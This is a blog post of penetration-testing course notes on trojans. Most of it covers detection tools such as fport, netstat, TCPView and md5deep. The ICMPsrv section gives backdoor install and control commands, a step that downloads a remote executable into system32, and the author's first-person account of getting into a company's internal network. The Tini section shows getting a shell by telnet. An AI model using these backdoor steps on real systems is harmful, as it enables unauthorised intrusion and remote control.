[COURSE_PTHE] 6. Tro_jan

1. 简介:Trojans

    该视频简单讲述了Trojan的背景知识,并介绍了后续课程中如何制作Trojan、利用封装/加壳技术来使得文件/程序能够被Victim执行等。

    The topics explored in the Trojans Module include:

  • Whiteboard, which shows the interrelationships of all the basic components utilized in this module
  • And the following simulation labs:
    • fPort Lab
    • ICMPSrv Lab
    • MD% Lab
    • netStat Lab
    • PRCView Lab
    • TCP View Lab
    • Tini Lab

 

2. 框架

    该视频环绕Trojan,简要介绍了两个部分的内容,包括:Trojan的原理及防御方法。(We explain how a trojan is a remote administration tool (RAT) that gives the full control of the victim’s PC to the attacker. Essentially, a Trojan is malicious code hidden inside non-malicious code.)

 

3. fport使用

    该视频简要介绍了利用fport命令来检测系统后台正在运行的执行文件及其PID及Port,以及同一进程使用多个端口的情况,通过查看当前系统开放的端口和使用情况,我们可以发现可疑进程,防止有木马程序正在悄悄危害我们的计算机。

    在win7下,进行fport命令,却无法显示任何信息,查看原因是因为fport是工作在windows2000下的命令行工具,可以在windows NT/vista/XP系统中运行,不支持在win7系统上运行,所以将fport放置到XP系统的根目录下进行。

    fPort is a run command that maps each process ID on the network.  fPort goes beyond what information is displayed in the Task Manager.  fPort also sorts its output by protocol and lists the process name, port, as well as the location/path on the network.

    From this Trojan lab, you’ll learn how to determine if the process is active, what it affects and/or if it’s connected to and other important real-time information.

 Windows版本:fport2.0

4. ICMPsrv使用

    该视频介绍了如何在客户端和服务端安装icmpsend和icmpsrv、执行及注销服务等命令来进行ping data的交互。

    ICMP is a tunnel command application with both client (icmpsend) and server (icmpsrv) level options for obtaining client and server usage info.

    ICMP’s sole purpose is to validate the traffic link between those targeted nodes on the network.

 1 需要采用客户端和服务端的合作。
 2 例如:
 3    服务端(Victim)采用Windows Server系列,安装icmpsrv
 4     > icmpsrv -install
 5     > netstat -a
 6    
 7    客户端安装icmpsend
 8     > icmpsend [victim IP]
 9     >> dir
10     >> ipconfig
11     >> ...
12 
13    在客户端打开Wireshark监听icmp(ping data)

 

 

  与backdoor协作运用举例:
    C/S backdoor其实用途最广的地方在于突破网关后对内网计算机的控制,因为很多机密数据都是放在内网计算机上的,而控制内网计算机并不是我们想到位的商业网络进行Ibtrusion Detection,它的网络内部并不像我们常见的内网那样非常容易入侵和控制,因为该公司本身涉及到一些网络安全的服务,所以内网PC的防护是很到位的,在尝试过很多后门后,最后ICMP Door帮我实现了成功的渗透内网!
    首先使用icmpsrv.exe -install参数进行backdoor的安装,再使用icmpsend.exe IP进行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下载文件,保存在[url=file://\\system32\]\\system32\[/url]目录下,文件名为hkfx.exe,程序名前的“-”不能省去,使用[pslist]还可以列出远程主机的进程名称和pid,再使用[pskill id]就可以杀进程了,同样,输入普通cmd命令,则远程主机也就执行了相关的命令。 ~HF1 ? %
    backdoor基于的c/s构架,必须要使用icmpsend才能激活服务器,但是他也有自己的先天不足:后门依靠ICMP进行通讯,经过冲击波的洗礼后,很少有服务器还接受ICMP包了,很多都屏蔽掉了它,所以用它来控制服务器不是一个好办法,这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧?!
 
Windows版本:ICMP
 

5. MD5使用

    该视频介绍了如何利用md5sum/md5deep/tigerdeep等工具来识别文件的唯一标识的。

    MD5 is a run line command used to identify the message digest of a file.  This information verifies that the integrity of a file “has or has not” been changed which is critically important to learning the behavior of Trojans and how to combat them.

1 KALI和Windows版本
2 
3   标示一个文件的唯一标识。
4   
5   KALI中有同样功能的工具很多,例如md5deep
6     # md5deep -r [dir]  // 列出在dir路径下所有文件的md5值
7     # tigerdeep -r [dir]  // 列出在dir路径下所有文件的tiger hash

 

 

6. netstat工具

    该视频介绍了如何使用windows下的netstat命令来显示TCP/IP协议的连接状态。

    netStat is a run line command that displays protocol stats and the current TCP/IP connections.  Each version of netStat is syntax specific, so this Trojan lab demonstrates some of those syntax variations from one version of netStat to another.

1 Windows下
2   > netstat /?
3   > netstat -ano
4 
5 Kali下
6   # netstat -help
7   
8 在WindowsXP,WindowsServer及Linux等等系统下netstat的命令参数选项有些是不同的,请留意。

 

 

7. PrcView使用

    Need to recon a Trojan? This lab shows you how, with PrcView. PrcView is a process-focused forensic analysis and Trojan reconnaissance tool.

    缺点:无法显示PORT。

    PrcView is a process-focused forensic analysis and Trojan reconnaissance tool.  Its output displays process by name, ID, priority and path/location, key information you’ll need in conducting Trojan reconnaissance.

Windows版本: Process Viewer

 

8. TcpView使用

    For this Trojan simulation lab, you'll learn how to use the Tcp View utility. The TcpView utility displays “EACH” process, and it does so sorted by protocol.

    能够实时显示后台exe执行状态并并对其操作与监控。

    The TcpView utility displays “EACH” process, and it does so sorted by protocol.  More importantly, TCPView provides the local and remote port address, and the status “IN REAL TIME” of each process. Real time status of system process offer a great advantage to determining how quickly your response time must be in identifying and locating Trojans.

Windows版本:TCPView 

 

9. Tini使用

    The final lab in the Trojan simulation series is Tini. In this lab you’ll learn the basics of how a Trojan works and how Trojans operates.

    该视频简单介绍了如果在成功运行backdoor之后,通过telnet连接remote的小实验。

    Tini is the most significant of the all the lab lessons covered in the Trojans module.  In this lab you’ll learn the basics of how a Trojan works and how Trojans operates.

    Tini is a telnet utility that gives you access to the system if you can get the user to launch it.

1 Windows下
2 
3   > netstat -a
4   > trojan.exe
5   > netstat -a 
6   > telnet [remote IP] [PORT]
7   get shell

 

Windows版本:telnet

posted @ 2015-09-30 21:34  It's_Lee  阅读(320)  评论(0编辑  收藏  举报